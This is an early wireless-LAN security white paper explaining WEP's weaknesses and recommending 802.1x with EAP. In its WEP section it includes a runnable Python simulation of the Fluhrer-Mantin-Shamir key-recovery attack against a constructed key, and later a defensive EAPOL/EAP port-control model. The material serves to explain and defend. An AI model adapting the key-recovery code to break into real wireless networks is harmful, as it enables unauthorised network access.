Introduction: The case for REAL Wireless LAN Security
The problem with WEP: Why Wired Equivalent Privacy is not so private
Interim solution with VPN: Why VPN is not the best solution
Introducing 802.1x and EAP: The new gold standard in Wireless LAN Security
Various flavors of EAP: The emergence of four EAP standards
Hardware requirements: Compatible Client Adaptor and Access Points
Conclusion: Security is worth every penny
As the promise of Wireless LANs becomes ever more enticing, the peril of your LAN security being split wide open becomes ever more daunting. The problem: Joe User (your typical technically savvy employee) can walk down to the local computer store, buy a $100 Wireless Access Point and have Wireless LAN freedom in 15 minutes. Unfortunately, he has just opened your private internal network to the entire world, because anyone within radio range can now bypass your firewall. Finding one of these rogue access points is no simple matter, and when you finally manage to shut one down, another two pop up somewhere else. WEP (Wired Equivalent Privacy), the encryption protocol that all WiFi 802.11b devices use to secure the wireless network, is at best enabled half the time. Even when WEP is enabled, its well publicized weaknesses mean it adds only minimal protection against even a casual attacker. The only solution is to deploy an official Wireless LAN with real Wireless LAN security while banning users from setting up their own wireless networks; providing a convenient and secure alternative is the only way to make such a ban stick. In this paper we examine the problems with WEP, the solution offered by 802.1x and EAP, and the concepts and implementation of an enterprise-worthy wireless LAN.
The problem with WEP:
When the 802.11 standards for wireless networking were written, a fundamental security issue had to be resolved. Because the physical layer of a wireless network carries radio signals through the open air rather than electrical signals through closed wires, the wireless signal has none of the physical security that wired networking enjoys. WEP was created to address this fundamental liability. It was supposed to give wireless networks the equivalent privacy of wired networks using 40-bit and 104-bit keys (marketed as 64-bit and 128-bit WEP, the remaining 24 bits being the per-packet Initialization Vector). Unfortunately, the effort produced a Wired Equivalent Privacy that was not so private. Soon after the release of the 802.11b specification with WEP, security researchers discovered massive weaknesses in WEP arising from the way it uses the RC4 stream cipher: the 24-bit IV is simply prepended to the static key to form the per-packet RC4 key, and for certain IVs RC4's key scheduling leaks information about the key bytes that follow. The well publicized paper "Weaknesses in the Key Scheduling Algorithm of RC4" by Fluhrer, Mantin, and Shamir spawned freeware tools such as AirSnort and WEPCrack that passively capture a data sample (100 to 1000 MB of traffic) and recover the key statistically, not by brute force, in as little as a few hours. This means that anyone with a laptop and a 60 dollar 802.11b adapter can get behind your firewall with minimal time and effort, even when the maximum key length is enforced.
Making the situation worse, the limited range of 802.11 products is no sanctuary, because you can be attacked from well beyond your own parking lot. Ten dollars of parts from Radio Shack and a Pringles potato chip can will boost an 802.11 card's 100 foot range to something like 10 miles line of sight, not to mention what an industrial grade directional antenna can do.
To put the final nail in the coffin, the 802.11 standard has no facility to centrally manage or distribute keys, so WEP is crippled by the fact that the WEP key is the same for all users and all sessions and never changes. Since every station seeds RC4 with the same key, the only per-packet variation is the 24-bit IV, and an attacker can keep accumulating weak-IV packets for as long as that key stays in service. Attempting to change the WEP key manually is highly impractical, because you must communicate the new key to every wireless user so that each of them can enter it into their WEP settings by hand. The final result is a WEP standard that is worthless for anything other than casual home web surfing.
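The attack the preceding paragraphs describe, worked through in Python as an added example (this is not code from the article, nor from AirSnort or WEPCrack). It keys RC4 with IV||K per frame exactly as WEP does, uses the FMS weak-IV class (B, 0xFF, x) and the fixed LLC/SNAP header AA AA 03 as the known first plaintext byte, and recovers a 40-bit key byte by byte with the FMS vote. The key value, and the convenience of the victim transmitting one frame per weak IV, are constructed assumptions.

```python
"""Simulated Fluhrer-Mantin-Shamir (FMS) key recovery against WEP's use of RC4.

Added example, not code from the article. The victim keys RC4 with IV||K per frame,
exactly as WEP does; the attacker sees only the IV and the first ciphertext byte.
Every 802.11 data frame starts with the LLC/SNAP header AA AA 03, so the first
keystream byte is always known. The 40-bit key is a constructed value.
"""
SNAP_HEADER = bytes((0xAA, 0xAA, 0x03))  # fixed first three plaintext bytes of a WEP frame
SECRET_KEY = bytes.fromhex("5ec7e7ca4d")  # constructed 40-bit WEP key; the attacker never reads it

def rc4_ksa(key):
    """RC4 key scheduling: the permutation S derived from `key` (bytes)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_keystream(key, n):
    """First n RC4 keystream bytes for `key`."""
    S, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt_snap(secret_key, iv):
    """Victim side: WEP prepends the 24-bit IV to the shared key and runs RC4.
    Only the SNAP header bytes of the frame are modelled."""
    ks = rc4_keystream(iv + secret_key, len(SNAP_HEADER))
    return bytes(p ^ k for p, k in zip(SNAP_HEADER, ks))

def fms_guess(known_prefix, z1):
    """One FMS vote for key byte B = len(known_prefix); known_prefix is the IV
    followed by the key bytes recovered so far. Replay the first B KSA steps
    (every input is known). In a 'resolved' state (S[1] < B and S[1]+S[S[1]] == B)
    the first keystream byte z1 equals S[B] after step B whenever the remaining
    steps leave positions 1, S[1] and B alone (about 5% of the time). That pins
    down the j used at step B and therefore K[B]; otherwise the vote is noise."""
    B = len(known_prefix)
    S, j = list(range(256)), 0
    for i in range(B):
        j = (j + S[i] + known_prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] < B and S[1] + S[S[1]] == B:
        return (S.index(z1) - j - S[B]) & 0xFF  # j_{B+1} = j + S[B] + K[B] and z1 = S[j_{B+1}]
    return None

def weak_ivs(B):
    """FMS weak-IV class (B, 0xFF, x): two KSA steps leave S[1] == 0 and S[0] == B."""
    return [bytes((B, 0xFF, x)) for x in range(256)]

def leak_is_clean(full_key, B):
    """Ground truth using the victim's key (study aid only): True when the IV is
    resolved for byte B and no later KSA step touches positions 1, S[1] or B,
    in which case fms_guess is exactly right."""
    S, j = list(range(256)), 0
    for i in range(B):
        j = (j + S[i] + full_key[i % len(full_key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if not (S[1] < B and S[1] + S[S[1]] == B):
        return False
    protected = {1, S[1], B}
    for i in range(B, 256):
        j = (j + S[i] + full_key[i % len(full_key)]) & 0xFF
        if j in protected and (i > B or j != B):  # step B may swap S[B] with itself
            return False
        S[i], S[j] = S[j], S[i]
    return True

def fms_attack(capture, key_len):
    """Recover key_len key bytes given capture(iv) -> ciphertext of one frame sent
    under that IV. Real attackers cannot pick IVs and must sniff until enough
    weak-IV frames have passed; here the victim sends one frame per weak IV."""
    recovered = b""
    for position in range(3, 3 + key_len):  # index of the target byte inside IV||K
        votes = [0] * 256
        for iv in weak_ivs(position):
            z1 = capture(iv)[0] ^ SNAP_HEADER[0]
            cand = fms_guess(iv + recovered, z1)
            if cand is not None:
                votes[cand] += 1
        recovered += bytes([max(range(256), key=votes.__getitem__)])
    return recovered

def key_checks_out(capture, candidate, iv=bytes((1, 2, 3))):
    """Attacker's verification: the candidate must strip a sniffed frame back to AA AA 03."""
    ks = rc4_keystream(iv + candidate, len(SNAP_HEADER))
    return bytes(c ^ k for c, k in zip(capture(iv), ks)) == SNAP_HEADER

if __name__ == "__main__":
    sniffed = lambda iv: wep_encrypt_snap(SECRET_KEY, iv)  # the attacker's only view of the victim
    guess = fms_attack(sniffed, len(SECRET_KEY))
    verdict = "verified" if key_checks_out(sniffed, guess) else "tally too thin, keep sniffing"
    print("recovered", guess.hex(), verdict)
```

Run stand-alone it prints the recovered key and whether that key decrypts a sniffed frame back to AA AA 03. The tally is statistical: roughly 5% of resolved IVs vote for the right byte and the rest vote for noise, so with only 256 weak IVs per key byte the top candidate is occasionally wrong, which is exactly why the real tools verify a candidate and keep sniffing on failure. Under a static key, weak IVs for a given key byte turn up in about one frame in 65,000, which is where the "millions of packets" figure comes from; rotate the key before that many frames are sent and the votes never accumulate.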
Interim solution with VPN:
As a temporary measure to secure wireless networking, the IT industry began turning to IPSEC based VPNs with 3DES encryption. Companies could sometimes leverage their existing Internet VPN infrastructure if it had excess capacity; otherwise, cost could become a major prohibitive factor. But even ignoring cost, VPN is not the cure-all solution, due to several key issues.
The first problem is ease of use: wireless users must take the additional step of bringing up a VPN connection after they have acquired a wireless association. Any interruption in service (common with wireless networking) then drops the VPN connection, forcing the user to reconnect to the VPN server again and again.
The second problem is QoS: because all of the wireless traffic is tunneled, quality-of-service mechanisms cannot see and prioritize individual flows. Without QoS, applications that require priority handling may fail.
The third problem is security: although all wireless traffic is encrypted by the VPN, the wireless LAN interface on the client machine is itself wide open. This is just like connecting to the public Internet without a firewall, giving attackers a free crack at your WLAN interface over the air or over the web. To address this, a software personal firewall must be installed on the WLAN interface.
Several VPN vendors have sprung up to meet this challenge and address some of these issues with features such as "Auto-Reconnect", but none of them address the real issue of achieving true "Wired Equivalent Privacy". This is not to say that VPN has no place in wireless networking, because it does. Wireless ISPs and wireless hotspots such as Starbucks are the perfect place to use a VPN, and in fact it is the only appropriate solution in that scenario. It shares the same VPN infrastructure as wired ISPs and wired hotspots and is identical in purpose and functionality; being wired or wireless on the Internet makes no difference because you are on a hostile network to begin with. However, VPNs should not be used for Wireless LANs. This is where a true "Wired Equivalent Privacy" solution makes perfect sense, allowing a secure and direct VPN-free connection to your internal LAN.
Introducing 802.1x and EAP:
Soon after the shortcomings of WEP and 802.11 were recognized, the industry settled on 802.1x and EAP as the solution. 802.1x is the IEEE standard for "Port Based Access Control" for both wired and wireless networking, and in itself it does not make wireless networking secure. But in conjunction with EAP (Extensible Authentication Protocol), the IETF authentication framework originally defined for PPP, the gold standard in Wireless Network Security is born. 802.1x acts as the gatekeeper while EAP provides the authentication mechanism, and the combination of the two resolves the biggest liability of WEP: static user keys and static session keys. With the EAP types discussed here, user authentication is mutual, WEP keys can be centrally managed under policy, and keys can be distributed securely. With this key management and distribution infrastructure, WEP keys can be unique to each user and each session. In addition, the key can be set to expire automatically, for example every 10 minutes, forcing constant re-keying and making it impractical to collect the 100-1000 Megabytes of data required to break WEP. "Wired Equivalent Privacy" can finally be a reality.
In Figure 1, the client first associates to the Access Point in the unauthorized 802.1x state and is restricted to authentication traffic. Using EAP, mutual authentication is performed; the exact EAP type is an open choice that depends on vendor implementation and is covered in detail later in this paper. Once mutual authentication completes, the Access Point switches the port to the authorized 802.1x state, allowing the Supplicant onto the internal network. When the session timeout elapses (10 minutes here; the administrator defines the expiration), the session expires and the EAP process runs again to buy another 10 minutes of wireless access. The entire 802.1x and EAP exchange is fully transparent to the user and typically completes in a fraction of a second.
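The exchange in Figure 1, as an added example (not code from the article or from any vendor's supplicant or RADIUS server): it encodes and parses EAPOL (802.1X) and EAP (RFC 2284) frames, models the Access Point's controlled port with a Session-Timeout, and scripts the authentication server's side so that an Identity response is answered with an EAP-TLS Start and the next response with EAP-Success. The identity joe.user@example.com, the 600-second timeout and the elided TLS records are constructed placeholders.

```python
"""802.1X port control with EAP, end to end in miniature.

Added example, not code from the article or any vendor's supplicant. EAPOL framing
follows IEEE 802.1X-2001, EAP framing RFC 2284, and EAP-TLS type 13 is from RFC 2716.
The RADIUS server is a scripted stand-in, the TLS handshake records are elided, and
the identity and the 600-second Session-Timeout are constructed values.
"""
import struct

EAPOL_VERSION = 1
EAPOL_EAP, EAPOL_START = 0, 1                                # EAPOL packet types used here
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_IDENTITY, EAP_TLS = 1, 13                                # EAP method types
TLS_START = b"\x20"                                          # EAP-TLS flags byte, S bit set

def eap(code, ident, method=None, data=b""):
    """EAP packet: code, identifier, length, then type + data for Request/Response."""
    body = b"" if method is None else bytes([method]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body

def eapol(ptype, body=b""):
    """EAPOL frame: protocol version, packet type, body length, body."""
    return struct.pack("!BBH", EAPOL_VERSION, ptype, len(body)) + body

def parse_eapol(frame):
    """Return (packet_type, eap_fields or None); both length fields must agree."""
    if len(frame) < 4:
        raise ValueError("short EAPOL frame")
    _version, ptype, length = struct.unpack("!BBH", frame[:4])
    body = frame[4:4 + length]
    if len(body) != length:
        raise ValueError("EAPOL body length does not match frame")
    if ptype != EAPOL_EAP:
        return ptype, None
    if length < 4:
        raise ValueError("short EAP packet")
    code, ident, eap_len = struct.unpack("!BBH", body[:4])
    typed = code in (EAP_REQUEST, EAP_RESPONSE)
    if eap_len != length or code not in (1, 2, 3, 4) or (typed and length < 5):
        raise ValueError("malformed EAP packet")
    return ptype, {"code": code, "id": ident,
                   "type": body[4] if typed else None,
                   "data": body[5:] if typed else b""}

class AccessPoint:
    """802.1X authenticator. EAPOL always passes on the uncontrolled port; LAN
    traffic passes on the controlled port only while `authorized`. `radius` takes a
    parsed EAP Response and returns the next EAP packet (Request, Success or
    Failure) for the AP to relay, standing in for the RADIUS round trip."""

    def __init__(self, radius, session_timeout):
        self.radius, self.session_timeout = radius, session_timeout
        self.authorized, self.expires_at = False, None

    def eapol_in(self, frame, now):
        """Handle one EAPOL frame from the supplicant; return the reply frame or None."""
        ptype, pkt = parse_eapol(frame)
        if ptype == EAPOL_START:                             # client asks to be authenticated
            return eapol(EAPOL_EAP, eap(EAP_REQUEST, 1, EAP_IDENTITY))
        if pkt is not None and pkt["code"] == EAP_RESPONSE:  # relay to the backend
            reply = self.radius(pkt)
            if reply[0] == EAP_SUCCESS:                      # Access-Accept: open the port
                self.authorized, self.expires_at = True, now + self.session_timeout
            elif reply[0] == EAP_FAILURE:
                self.authorized = False
            return eapol(EAPOL_EAP, reply)
        return None

    def data_in(self, now):
        """Controlled port: True if a LAN frame would be forwarded at time `now`.
        Session-Timeout closes the port again, forcing a fresh EAP run (and, with
        dynamic WEP, a fresh key) before any more traffic flows."""
        if self.authorized and now >= self.expires_at:
            self.authorized = False
        return self.authorized

def scripted_radius(resp):
    """Stand-in for the RADIUS/EAP server: Identity -> EAP-TLS Start -> Success.
    A real server drives the whole TLS handshake through further Request/Response
    rounds before issuing Success; those rounds are elided here."""
    if resp["type"] == EAP_IDENTITY:
        return eap(EAP_REQUEST, resp["id"] + 1, EAP_TLS, TLS_START)
    if resp["type"] == EAP_TLS:
        return eap(EAP_SUCCESS, resp["id"])                  # Success echoes the Response id
    return eap(EAP_FAILURE, resp["id"])

def run_session(ap, now, identity=b"joe.user@example.com"):
    """Supplicant side: send EAPOL-Start, then answer each Request with a Response
    of the same type and identifier. Returns the EAP codes received, in order."""
    codes = []
    reply = ap.eapol_in(eapol(EAPOL_START), now)
    while reply is not None:
        _, req = parse_eapol(reply)
        codes.append(req["code"])
        if req["code"] in (EAP_SUCCESS, EAP_FAILURE):
            break
        data = identity if req["type"] == EAP_IDENTITY else b"\x00"  # elided TLS record
        reply = ap.eapol_in(eapol(EAPOL_EAP, eap(EAP_RESPONSE, req["id"], req["type"], data)), now)
    return codes

if __name__ == "__main__":
    ap = AccessPoint(scripted_radius, session_timeout=600)
    print("forwarded before EAP:", ap.data_in(0))       # False: port starts unauthorized
    print("EAP codes seen:", run_session(ap, now=0))    # [1, 1, 3]: Request, Request, Success
    print("forwarded at t=5:", ap.data_in(5))           # True
    print("forwarded at t=600:", ap.data_in(600))       # False: timeout, EAP must run again
```

The point to notice is that the port, not the client, decides when data flows: before EAP-Success, data_in returns False however much the station transmits, and when the timeout expires the port closes again until another EAP run completes, which with dynamic WEP is also the moment the new per-session key is delivered. The parser rejects frames whose EAPOL and EAP length fields disagree with each other or with the bytes present, the usual first check on anything arriving over the uncontrolled port.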
Various flavors of EAP:
Because 802.1x and EAP are open standards, implementation is left to individual vendors. As a result, four types of EAP have emerged as de facto standards. They all share the underlying 802.1x and EAP architecture shown in Figure 1; the only difference is how each performs mutual authentication within EAP.
Hardware requirements:
Almost all 802.11 wireless adapters support 802.1x and EAP-TLS natively under Windows XP. With older operating systems, 802.1x driver support depends on the vendor of the wireless adapter. For true Cisco LEAP support you will need to purchase a Cisco PC Card; only Cisco 802.11 adapters support LEAP natively. Most client adapters are also compatible with Funk's EAP-TTLS. Some Intersil Prism chipsets can emulate all four EAP standards with the aid of the MDC (Meetinghouse Data Communications) Aegis client, although not with 100% compatibility. Most Orinoco adapters cost $60 to $100 while Cisco adapters cost $110 to $140. Integrated adapters from a laptop vendor with full EAP-TLS support and LEAP emulation can cost as little as $50.
For client access software, Windows XP provides native OS support for EAP-TLS. Support for older Windows operating systems such as 2000, 98, NT and Pocket PC is to be added by Microsoft by the end of 2002. For LEAP, Cisco provides the only native client, and its OS support is extensive; the Cisco client is bundled with their Aironet wireless adapters. Funk has its own Odyssey client for native EAP-TTLS support, and its OS support is also excellent. Third-party solutions such as the one from MDC (Meetinghouse Data Communications) can offer any of the four EAP types, and some integrated wireless solutions bundle the MDC client. For the most part, 802.1x and EAP support is exclusive to the Microsoft Windows platform; Unix supplicants exist but are rare.
For Access Points, only the industrial grade products support 802.1x and EAP, such as those from Agere (Lucent spin-off), Cisco, Intel, Avaya, Buffalo Technology, 3Com, Enterasys, Intermec, Nokia and Symbol. You definitely need to check with the vendor which products in their line support 802.1x and your desired flavor of EAP. These high-end Access Points cost $400 to $1000 depending on the features included. That is certainly a lot more than the SOHO products at $100 to $200, but you get vastly superior features: dynamic WEP, better antennas, upgradeable hardware and software, and better reliability than the cheap SOHO solutions.
For RADIUS, you can use FreeRADIUS on Linux, Cisco's ACS/AR RADIUS, Funk Software's Odyssey or Steel Belted RADIUS, Interlink Networks, Open Systems Consultants, or Microsoft IAS (bundled with Windows 2000). The Linux and Microsoft solutions are virtually free, since Linux is open source and you can run IAS on your existing Domain Controllers; of the two, IAS is substantially easier to install and administer and has proven reliable. The other solutions range between $2000 and $6000. All of these RADIUS solutions support EAP-TLS. LEAP is supported by all but Microsoft, and EAP-TTLS is supported only by Funk's solution.
PKI (Public Key Infrastructure) is required for EAP-TLS, since both the server and every client authenticate with certificates. Microsoft Windows 2000 Server bundles the CA (Certificate Authority) service with the OS, so pricing is extremely attractive, and much of the PKI can be put onto your existing Windows 2000 servers. You can also purchase certificates from public CAs such as Verisign, but that is not recommended for practicality and pricing reasons.
While Cisco and Funk have proprietary versions of EAP, Agere uses its own proprietary encryption scheme, AS2000, which bypasses WEP and EAP entirely while still using 802.1x. However, all three vendors, like nearly every other vendor, support EAP-TLS.
Making the choice:
As you can see, you have quite a few options to choose from. It can be a tough decision, considering that LEAP and EAP-TTLS have full OS support now but are each locked to a single vendor, while EAP-TLS is just the opposite: full vendor support but currently locked to a single OS. Possibly confusing the issue further, PEAP is on the horizon. The decision is simpler if you already have some of the required infrastructure in place that can be leveraged for a specific flavor of EAP, or if you have strong preferences for a certain vendor. The ultimate direction of wireless LAN security will likely be EAP-TLS for maximum enterprise-level security and PEAP's pretty good security for small businesses that lack the skill set to implement a public key infrastructure. Cisco's LEAP will continue to have a large legacy installed base for the next few years. But regardless of the lack of a single standard, make no mistake: WEP can and should be secured now with any of these three existing solutions. Fortunately, most of the hardware firmware and client software you buy now will be upgradeable in the future.
Security is worth every penny:
For any business network where wireless encryption needs to hold for more than a day, the time for real wireless LAN security is now. 802.1x and EAP have finally brought us true "Wired Equivalent Privacy" by giving us dynamic WEP keys. The days when we could tolerate the cheap $100 SOHO solutions are long gone, and even though this may seem like a steep investment, your company's security should be worth every penny. Overall security is about the weakest link: your $100,000 firewall is useless if someone can bypass it with a rogue access point, with or without standard WEP.